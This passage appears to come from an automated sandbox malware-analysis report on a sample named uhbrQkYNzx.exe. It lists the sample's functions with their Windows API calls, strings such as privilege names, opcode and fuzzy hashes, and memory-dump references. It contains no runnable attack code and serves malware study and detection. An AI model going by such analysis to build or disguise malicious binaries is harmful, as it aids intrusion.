                                                              • Associated: 00000000.00000002.1505189878.00000000009CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505215539.00000000009D9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505215539.00000000009E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505253992.00000000009E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_990000_uhbrQkYNzx.jbxd
                                                              Similarity
                                                              • API ID: ErrorLast$CloseCurrentH_prolog3_HandleProcess
                                                              • String ID: SeRestorePrivilege$SeSecurityPrivilege
                                                              • API String ID: 2235100918-639343689
                                                              • Opcode ID: 48ad49f21adcc7b7231d4ce8b52a23bdc7ad232054a6633ba4cd13be8344b14d
                                                              • Instruction ID: 348fcb07ab54621dcd8aa4ba08aefbcd0d0a90b90c6e7896f52814136523f3e0
                                                              • Opcode Fuzzy Hash: 48ad49f21adcc7b7231d4ce8b52a23bdc7ad232054a6633ba4cd13be8344b14d
                                                              • Instruction Fuzzy Hash: 3E417F70E14208AFDF14EBACE986BEDB7B8EB49314F04401EF501B7291DB749944CB66
                                                              Function 009BEE2A Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 116COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\uhbrQkYNzx.exe,00000104), ref: 009BEE6A
                                                              • _free.LIBCMT ref: 009BEF35
                                                              • _free.LIBCMT ref: 009BEF3F
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1505147246.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true
                                                              • Associated: 00000000.00000002.1505121864.0000000000990000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505189878.00000000009CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505215539.00000000009D9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505215539.00000000009E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505253992.00000000009E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_990000_uhbrQkYNzx.jbxd
                                                              Similarity
                                                              • API ID: _free$FileModuleName
                                                              • String ID: C:\Users\user\Desktop\uhbrQkYNzx.exe
                                                              • API String ID: 2506810119-2973279814
                                                              • Opcode ID: f7368914b78de1f47e6290757f348aa188f0fc70803d37fb25962f3b11311a61
                                                              • Instruction ID: f50e26a8448d32c5acd1b0d4ca06449fb843d2f9da05f651b71944721332d7f5
                                                              • Opcode Fuzzy Hash: f7368914b78de1f47e6290757f348aa188f0fc70803d37fb25962f3b11311a61
                                                              • Instruction Fuzzy Hash: AE318D71E08398AFDB21DB999D81EEEBBFCEB95320F14406AF4049B211D7719E40DB91
                                                              Function 009B9E56 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 112COMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              APIs
                                                              • EncodePointer.KERNEL32(00000000,?,00000000,1FFFFFFF), ref: 009B9E7B
                                                              • _abort.LIBCMT ref: 009B9F86
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1505147246.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true
                                                              • Associated: 00000000.00000002.1505121864.0000000000990000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505189878.00000000009CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505215539.00000000009D9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505215539.00000000009E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505253992.00000000009E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_990000_uhbrQkYNzx.jbxd
                                                              Similarity
                                                              • API ID: EncodePointer_abort
                                                              • String ID: MOC$RCC
                                                              • API String ID: 948111806-2084237596
                                                              • Opcode ID: 7cde34839e313cc1d7f6cbe8ea81afff56419112f82ffb67689cda219919d909
                                                              • Instruction ID: 0f9e5b1d6415f7a669a381dbe299b2a1028cfa5209d8cad69d7382aad9b4ad9d
                                                              • Opcode Fuzzy Hash: 7cde34839e313cc1d7f6cbe8ea81afff56419112f82ffb67689cda219919d909
                                                              • Instruction Fuzzy Hash: 5A413971910209EFDF15DF94CE81AEEBBBABF48324F188159FA04A7261D335AD50DB50
                                                              Function 009A338E Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 88COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • __fprintf_l.LIBCMT ref: 009A340E
                                                              • _strncpy.LIBCMT ref: 009A3459
                                                                • Part of subcall function 009A89ED: WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000050,?,00000000,00000000,009DE088,?,00000007,009A33E2,?,?,00000050,1AC349C0), ref: 009A8A0A
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1505147246.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true
                                                              • Associated: 00000000.00000002.1505121864.0000000000990000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505189878.00000000009CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505215539.00000000009D9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505215539.00000000009E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505253992.00000000009E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_990000_uhbrQkYNzx.jbxd
                                                              Similarity
                                                              • API ID: ByteCharMultiWide__fprintf_l_strncpy
                                                              • String ID: $%s$@%s
                                                              • API String ID: 562999700-834177443
                                                              • Opcode ID: 0813e9f3ced2344385ed1106bd3a925f0382dabce5dfb9219c1f2147999b57e5
                                                              • Instruction ID: c8a5bc2c7c5a25306dd9baad466139413b17c0fbb630f9540accdf338f4f7e4a
                                                              • Opcode Fuzzy Hash: 0813e9f3ced2344385ed1106bd3a925f0382dabce5dfb9219c1f2147999b57e5
                                                              • Instruction Fuzzy Hash: CD218F72900709ABDB10DEA8CC45FAE7BECBB4A310F044526FA1597191DB34EA158BA0
                                                              Function 009AF8F0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 86COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • __EH_prolog3_GS.LIBCMT ref: 009AF8F7
                                                                • Part of subcall function 00991E44: GetDlgItem.USER32(00000000,00003021), ref: 00991E88
                                                                • Part of subcall function 00991E44: SetWindowTextW.USER32(00000000,009CC6C8), ref: 00991E9E
                                                              • EndDialog.USER32(?,00000001), ref: 009AF99F
                                                              • SetDlgItemTextW.USER32(?,00000066,00000000), ref: 009AF9E1
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1505147246.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true
                                                              • Associated: 00000000.00000002.1505121864.0000000000990000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505189878.00000000009CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505215539.00000000009D9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505215539.00000000009E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505253992.00000000009E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_990000_uhbrQkYNzx.jbxd
                                                              Similarity
                                                              • API ID: ItemText$DialogH_prolog3_Window
                                                              • String ID: ASKNEXTVOL
                                                              • API String ID: 2321058237-3402441367
                                                              • Opcode ID: e85824ffc92456b370b577bbabb8f1a87563f8e60b812abf900b67215648b777
                                                              • Instruction ID: 4b45eed502a9f09122cf33aa7637ed633fd382b1dcdc527038445fa79e3e06c1
                                                              • Opcode Fuzzy Hash: e85824ffc92456b370b577bbabb8f1a87563f8e60b812abf900b67215648b777
                                                              • Instruction Fuzzy Hash: 6B219E31610205BFCB10EFA8CC96FAA37A8BB8B344F110024F5419B2A1C7309E01DBA2
                                                              Function 009A7445 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 63COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • InitializeCriticalSection.KERNEL32(00000320,00000000,?,?,?,0099FEBD,00000008,00000004,009A2D42,?,?,?,?,00000000,009AABB6,?), ref: 009A7484
                                                              • CreateSemaphoreW.KERNEL32(00000000,00000000,00000040,00000000,?,?,?,0099FEBD,00000008,00000004,009A2D42,?,?,?,?,00000000), ref: 009A748E
                                                              • CreateEventW.KERNEL32(00000000,00000001,00000001,00000000,?,?,?,0099FEBD,00000008,00000004,009A2D42,?,?,?,?,00000000), ref: 009A749E
                                                              Strings
                                                              • Thread pool initialization failed., xrefs: 009A74B6
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1505147246.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true
                                                              • Associated: 00000000.00000002.1505121864.0000000000990000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505189878.00000000009CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505215539.00000000009D9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505215539.00000000009E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505253992.00000000009E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_990000_uhbrQkYNzx.jbxd
                                                              Similarity
                                                              • API ID: Create$CriticalEventInitializeSectionSemaphore
                                                              • String ID: Thread pool initialization failed.
                                                              • API String ID: 3340455307-2182114853
                                                              • Opcode ID: 6e72a9ab3ae46a9c6330834b048c241bbde35f64600851bd68622691c247cbb6
                                                              • Instruction ID: 20550ec58886831dfab14bf81c9ab605ef0d9d357cfa3709322c7cf7c439ebd0
                                                              • Opcode Fuzzy Hash: 6e72a9ab3ae46a9c6330834b048c241bbde35f64600851bd68622691c247cbb6
                                                              • Instruction Fuzzy Hash: 6C11A7B1648705AFD3315FAA9C859A7FFDDEB99744F10482EF1D9C2210D67059408B50
                                                              Function 009B406A Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 54COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1505147246.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true
                                                              • Associated: 00000000.00000002.1505121864.0000000000990000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505189878.00000000009CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505215539.00000000009D9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505215539.00000000009E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505253992.00000000009E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_990000_uhbrQkYNzx.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: RENAMEDLG$REPLACEFILEDLG
                                                              • API String ID: 0-56093855
                                                              • Opcode ID: c4bd5dddabcd06a9e517fe0d38bf52aa53e9527f0d0b801829b63a2861340191
                                                              • Instruction ID: 667fe2364b85a0aac450ea3221dc5a55c25dc083233b44c95af75595a0042885
                                                              • Opcode Fuzzy Hash: c4bd5dddabcd06a9e517fe0d38bf52aa53e9527f0d0b801829b63a2861340191
                                                              • Instruction Fuzzy Hash: 9311863072D345EBD710EF18EE84A567BE8E759765B054829F642C7321C2719C44FF62
                                                              Function 009BA892 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 27libraryCOMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              APIs
                                                              • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,009BA843,00000000,?,009E6150,?,?,?,009BA9E6,00000004,InitializeCriticalSectionEx,009CF7F4,InitializeCriticalSectionEx), ref: 009BA89F
                                                              • GetLastError.KERNEL32(?,009BA843,00000000,?,009E6150,?,?,?,009BA9E6,00000004,InitializeCriticalSectionEx,009CF7F4,InitializeCriticalSectionEx,00000000,?,009BA79D), ref: 009BA8A9
                                                              • LoadLibraryExW.KERNEL32(00000000,00000000,00000000), ref: 009BA8D1
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1505147246.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true
                                                              • Associated: 00000000.00000002.1505121864.0000000000990000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505189878.00000000009CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505215539.00000000009D9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505215539.00000000009E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505253992.00000000009E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_990000_uhbrQkYNzx.jbxd
                                                              Similarity
                                                              • API ID: LibraryLoad$ErrorLast
                                                              • String ID: api-ms-
                                                              • API String ID: 3177248105-2084034818
                                                              • Opcode ID: 1d10913376051dcb789b65b0d6a3ee07341d75640d747070086a720116127536
                                                              • Instruction ID: a8707e9add74ae1990ee0c6fa7ab16d7dc144a6985ddc51a92e03ab5ed8ae598
                                                              • Opcode Fuzzy Hash: 1d10913376051dcb789b65b0d6a3ee07341d75640d747070086a720116127536
                                                              • Instruction Fuzzy Hash: C4E04870684205B7DF101FA0DD06F583E599B10B61F100034F94EA4CE0D761D911A6D6
                                                              Function 009C07EA Relevance: 6.3, APIs: 4, Instructions: 305COMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1505147246.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true
                                                              • Associated: 00000000.00000002.1505121864.0000000000990000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505189878.00000000009CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505215539.00000000009D9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505215539.00000000009E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505253992.00000000009E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_990000_uhbrQkYNzx.jbxd
                                                              Similarity
                                                              • API ID: __alldvrm$_strrchr
                                                              • String ID:
                                                              • API String ID: 1036877536-0
                                                              • Opcode ID: 1ec6666d94b4212580304211626675eb5ed9854efa503107affec4ce99a0ac8c
                                                              • Instruction ID: 601c55999e42a7e91099bad801630d00a1f7504ae6ad3768145fca91d26cd75e
                                                              • Opcode Fuzzy Hash: 1ec6666d94b4212580304211626675eb5ed9854efa503107affec4ce99a0ac8c
                                                              • Instruction Fuzzy Hash: 25A12671E04786DFEB11CF28C891FAEBBA8EFD5350F18416DE5959B282C6388941CB52
                                                              Function 009C3638 Relevance: 6.1, APIs: 4, Instructions: 110COMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              APIs
                                                              • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,009C0481,?,00000000,?,00000001,?,?,00000001,009C0481,?), ref: 009C3685
                                                              • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 009C370E
                                                              • GetStringTypeW.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,009BDBD1,?), ref: 009C3720
                                                              • __freea.LIBCMT ref: 009C3729
                                                                • Part of subcall function 009C040E: RtlAllocateHeap.NTDLL(00000000,009B535E,?,?,009B6C16,?,?,?,?,?,009B5269,009B535E,?,?,?,?), ref: 009C0440
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1505147246.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true
                                                              • Associated: 00000000.00000002.1505121864.0000000000990000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505189878.00000000009CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505215539.00000000009D9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505215539.00000000009E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505253992.00000000009E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_990000_uhbrQkYNzx.jbxd
                                                              Similarity
                                                              • API ID: ByteCharMultiWide$AllocateHeapStringType__freea
                                                              • String ID:
                                                              • API String ID: 2652629310-0
                                                              • Opcode ID: fd2268f37edf02e270032f3f293b271f62df9994a126d7ccb8698549470f89a5
                                                              • Instruction ID: edd388d49e68e4716f1f65daea49d96ed3f8bd4192dd773173d2d4ba32d05da0
                                                              • Opcode Fuzzy Hash: fd2268f37edf02e270032f3f293b271f62df9994a126d7ccb8698549470f89a5
                                                              • Instruction Fuzzy Hash: 1C31D2B1E0020AABDF249F65DC81EEE7BA9EB44350F04812CFC04D6251EB36CE51CB91
                                                              Function 009A62CD Relevance: 6.1, APIs: 4, Instructions: 60COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • __EH_prolog3.LIBCMT ref: 009A62D4
                                                              • ExpandEnvironmentStringsW.KERNEL32(?,00000000,00000000,?,?,?,?,?,00000010), ref: 009A62EB
                                                              • ExpandEnvironmentStringsW.KERNEL32(?,?,?,00000000,?,?,?,?,?,00000010), ref: 009A6328
                                                              • _wcslen.LIBCMT ref: 009A6338
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1505147246.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true
                                                              • Associated: 00000000.00000002.1505121864.0000000000990000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505189878.00000000009CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505215539.00000000009D9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505215539.00000000009E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505253992.00000000009E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_990000_uhbrQkYNzx.jbxd
                                                              Similarity
                                                              • API ID: EnvironmentExpandStrings$H_prolog3_wcslen
                                                              • String ID:
                                                              • API String ID: 3741103063-0
                                                              • Opcode ID: a3bf4eae05f36e8f5c4cd4a8a9570dc3b58220fcd46d5380b25e4fb8f0ef4116
                                                              • Instruction ID: 711a03ffe094dba8a1245b9497b3381b86c811a2bf0b03f033c3d5973d8969cd
                                                              • Opcode Fuzzy Hash: a3bf4eae05f36e8f5c4cd4a8a9570dc3b58220fcd46d5380b25e4fb8f0ef4116
                                                              • Instruction Fuzzy Hash: 8A115171A1120AAFDF049F688985ABFBB79BF45354718411DA411E7240DF349D41CBE5
                                                              Function 009A126C Relevance: 6.1, APIs: 4, Instructions: 60COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • __EH_prolog3.LIBCMT ref: 009A1273
                                                                • Part of subcall function 009A067E: GetVersionExW.KERNEL32(?), ref: 009A06AF
                                                              • FoldStringW.KERNEL32(00000020,?,000000FF,00000000,00000000,0000000C,0099350C,1AC349E8,00000000,?,?,009943F5,?,?,?,00000000), ref: 009A129A
                                                              • FoldStringW.KERNEL32(00000020,?,000000FF,?,?,00000000), ref: 009A12D4
                                                              • _wcslen.LIBCMT ref: 009A12DF
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1505147246.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true
                                                              • Associated: 00000000.00000002.1505121864.0000000000990000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505189878.00000000009CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505215539.00000000009D9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505215539.00000000009E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505253992.00000000009E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_990000_uhbrQkYNzx.jbxd
                                                              Similarity
                                                              • API ID: FoldString$H_prolog3Version_wcslen
                                                              • String ID:
                                                              • API String ID: 535866816-0
                                                              • Opcode ID: 57b1fbdc6ab48b73102ebe8006a0cb94a110ecbdbfd1a2293e1c503a51473805
                                                              • Instruction ID: 81da0c6d99311cef318ee70f41626dce7be404662811053c7373ddfa0c72b3cf
                                                              • Opcode Fuzzy Hash: 57b1fbdc6ab48b73102ebe8006a0cb94a110ecbdbfd1a2293e1c503a51473805
                                                              • Instruction Fuzzy Hash: B7115471A11126ABDF009FA98D45BAF7B69AF45720F100209F920E72D1CF609940CAE1
                                                              Function 009C19E4 Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              APIs
                                                              • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,00000000,00000000,00000000,?,009C198B,00000000,00000000,00000000,00000000,?,009C1B88,00000006,FlsSetValue), ref: 009C1A16
                                                              • GetLastError.KERNEL32(?,009C198B,00000000,00000000,00000000,00000000,?,009C1B88,00000006,FlsSetValue,009D0DD0,FlsSetValue,00000000,00000364,?,009C00D7), ref: 009C1A22
                                                              • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,009C198B,00000000,00000000,00000000,00000000,?,009C1B88,00000006,FlsSetValue,009D0DD0,FlsSetValue,00000000), ref: 009C1A30
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1505147246.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true
                                                              • Associated: 00000000.00000002.1505121864.0000000000990000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505189878.00000000009CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505215539.00000000009D9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505215539.00000000009E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505253992.00000000009E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_990000_uhbrQkYNzx.jbxd
                                                              Similarity
                                                              • API ID: LibraryLoad$ErrorLast
                                                              • String ID:
                                                              • API String ID: 3177248105-0
                                                              • Opcode ID: da0102a3df7e1dcc5b9a172b1ff500bc33b80c504889709e410485aea39f6250
                                                              • Instruction ID: 8d8b4513fc549583839476d8260e291555fa2f4184e718132fb97d3e177ad214
                                                              • Opcode Fuzzy Hash: da0102a3df7e1dcc5b9a172b1ff500bc33b80c504889709e410485aea39f6250
                                                              • Instruction Fuzzy Hash: 0201FC72E5B222ABCB218A689C44F567B9CAF567A1B110528F90ED7241C720DC00C6FD
                                                              Function 009A1309 Relevance: 6.0, APIs: 4, Instructions: 46COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • __EH_prolog3.LIBCMT ref: 009A1310
                                                              • GetCurrentDirectoryW.KERNEL32(00000000,00000000,0000000C,009A17FB,?,?,\\?\,1AC349C0,?,?,?,00000000,009CA279,000000FF), ref: 009A1319
                                                              • GetCurrentDirectoryW.KERNEL32(?,?,00000000,?,?,?,00000000,009CA279,000000FF), ref: 009A1348
                                                              • _wcslen.LIBCMT ref: 009A1351
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1505147246.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true
                                                              • Associated: 00000000.00000002.1505121864.0000000000990000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505189878.00000000009CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505215539.00000000009D9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505215539.00000000009E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505253992.00000000009E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_990000_uhbrQkYNzx.jbxd
                                                              Similarity
                                                              • API ID: CurrentDirectory$H_prolog3_wcslen
                                                              • String ID:
                                                              • API String ID: 19219720-0
                                                              • Opcode ID: 7328258c02e1357922773d69e4c993a5f8b97db1397c206fa7e84f3ba6bc6ea3
                                                              • Instruction ID: 6f21b7c90a979cf4c2adb6398c9094a832480216efc72263981bd2b659649bad
                                                              • Opcode Fuzzy Hash: 7328258c02e1357922773d69e4c993a5f8b97db1397c206fa7e84f3ba6bc6ea3
                                                              • Instruction Fuzzy Hash: D3018F71D0011AAB8F10EFB88A45ABFBB7DAF82720B150209B511A7241DF34590096E1
                                                              Function 009B631E Relevance: 6.0, APIs: 4, Instructions: 25COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • SleepConditionVariableCS.KERNELBASE(?,009B62BB,00000064), ref: 009B6341
                                                              • LeaveCriticalSection.KERNEL32(009E60E0,?,?,009B62BB,00000064,?,?,?,?,00000000,009CA75D,000000FF), ref: 009B634B
                                                              • WaitForSingleObjectEx.KERNEL32(00000064,00000000,?,009B62BB,00000064,?,?,?,?,00000000,009CA75D,000000FF), ref: 009B635C
                                                              • EnterCriticalSection.KERNEL32(009E60E0,?,009B62BB,00000064,?,?,?,?,00000000,009CA75D,000000FF), ref: 009B6363
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1505147246.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true
                                                              • Associated: 00000000.00000002.1505121864.0000000000990000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505189878.00000000009CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505215539.00000000009D9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505215539.00000000009E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505253992.00000000009E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_990000_uhbrQkYNzx.jbxd
                                                              Similarity
                                                              • API ID: CriticalSection$ConditionEnterLeaveObjectSingleSleepVariableWait
                                                              • String ID:
                                                              • API String ID: 3269011525-0
                                                              • Opcode ID: 9d981c6387bf6ad0e19862c5ef1e64c551f7d7232e552748ac8ad8421dcc6855
                                                              • Instruction ID: 2395c0b3052705d6391fd04b836ac3b3c36d34619ed4f91306c28fb6a21325b6
                                                              • Opcode Fuzzy Hash: 9d981c6387bf6ad0e19862c5ef1e64c551f7d7232e552748ac8ad8421dcc6855
                                                              • Instruction Fuzzy Hash: 0BE09232958274EBCF121B93EC09F9D7F68BB44BE2B044014F50AA6160C6616E10BBD4
                                                              Function 009AEB74 Relevance: 6.0, APIs: 4, Instructions: 19COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetDC.USER32(00000000), ref: 009AEB77
                                                              • GetDeviceCaps.GDI32(00000000,00000058), ref: 009AEB86
                                                              • GetDeviceCaps.GDI32(00000000,0000005A), ref: 009AEB94
                                                              • ReleaseDC.USER32(00000000,00000000), ref: 009AEBA2
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1505147246.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true
                                                              • Associated: 00000000.00000002.1505121864.0000000000990000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505189878.00000000009CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505215539.00000000009D9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505215539.00000000009E2000.00000004.00000001.01000000.00000003.sdmpDownload File
